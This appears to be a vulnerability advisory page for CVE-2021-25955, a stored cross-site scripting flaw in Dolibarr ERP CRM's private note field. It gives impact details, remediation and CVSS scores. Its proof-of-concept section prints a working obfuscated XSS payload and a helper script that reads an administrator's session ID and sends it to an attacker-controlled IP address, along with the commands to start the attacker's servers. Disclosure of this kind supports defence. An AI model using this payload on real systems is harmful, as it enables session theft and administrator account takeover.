icon

We found results for “

CVE-2021-25955

Date: August 15, 2021

Overview

In “Dolibarr ERP CRM”, WYSIWYG Editor module, v2.8.1 to v13.0.2 are affected by a stored XSS vulnerability that allows low privileged application users to store malicious scripts in the “Private Note” field at “/adherents/note.php?id=1” endpoint. These scripts are executed in a victim’s browser when they open the page containing the vulnerable field. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator. The injected scripts can extract the Session ID, which can lead to full Account takeover of the admin and due to other vulnerability (Improper Access Control on Private notes) a low privileged user can update the private notes which could lead to privilege escalation.

Details

The “Dolibarr ERP CRM”, WYSIWYG Editor module is affected by a stored XSS vulnerability that allows low privileged application users to store malicious scripts in the Private Note field at “/adherents/note.php?id=1” endpoint. These scripts are executed in a victim’s browser when they open the page containing the vulnerable field.\nIn the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator, so the injected scripts can extract the Session ID, which can lead to full Account takeover and as due to other vulnerability (Improper Access Control on Private notes) a low privileged user can update the private notes which could lead to privilege escalation.

PoC Details

For demonstration purposes we will use two users: “member1” (permissions to “Read members” and “Create/modify members”) and “admin” (administrator). Create a malicious JS that sends session id to the attacker over a GET request. Run a PHP Simple Server to host the malicious file. Run a Python Simple HTTP Server to get the extracted Session ID. Login to the application as member1. Go to My Dashboard option on the left pane and select member1 from the “Latest 5 members” section. Go to the Note option from the navigation bar and edit the public note, provide the payload in the field and capture the request with a web proxy (example: burp suite). Then modify the request captured above by converting public to private (in 3 parameters) and forward the request. Then login with “admin” user and go to the same endpoint and will find that a private note has been created. Administrator clicks on the private note initiating the malicious script. At our python server the attacker received the Session ID of the administrator. Using the Session ID captured above, the attacker can login as Administrator.

PoC Code

// Payload\n\n<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;var re;x=new XMLHttpRequest;x.onload%0d=function(){var ur=\'http://192.168.18.37:8090/test.js\';$.getScript(ur);};x.open(\'GET\',\'http://192.168.18.36/\');x.send();">Click to Get !!hacked!!</a>\n\n\n\n\n\n// File (test.js) contents:\n\nvar te = /[0-9a-zA-Z]+/gm; \n\nvar re;\n\nx=new XMLHttpRequest;\n\nx.onload=function(){\n\n



re = this.responseText;\n\n



var reg = /Session\\sID\\S+\\s\\S+/gm;\n\n



console.log(((re.match(reg))[0].match(te))[6]);\n\n



var sessionId=((re.match(reg))[0].match(te))[6];\n\n



var url = "http://192.168.18.37:9999/" + sessionId;\n\n



$.ajax(url);\n\n};\n\nx.open(\'GET\',\'http://192.168.18.36/admin/system/dolibarr.php\', true);\n\nx.withCredentials = true;\n\nx.send(null);\n\n\n\n\n\n// Command to run the Python Simple http Server to get the extracted Session ID.\n\n$ python3 \u2013m http.server 9999\n\n\n\n// Command to run the PHP Simple Server to host the malicious file.\n\n$ php \u2013S 192.168.18.37:8090

Affected Environments

2.8.1-13.0.2

Prevention

Upgrade to version 14.0.0

Language: PHP

Good to know:

icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

Upgrade to version 14.0.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privilegs Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial
Additional information: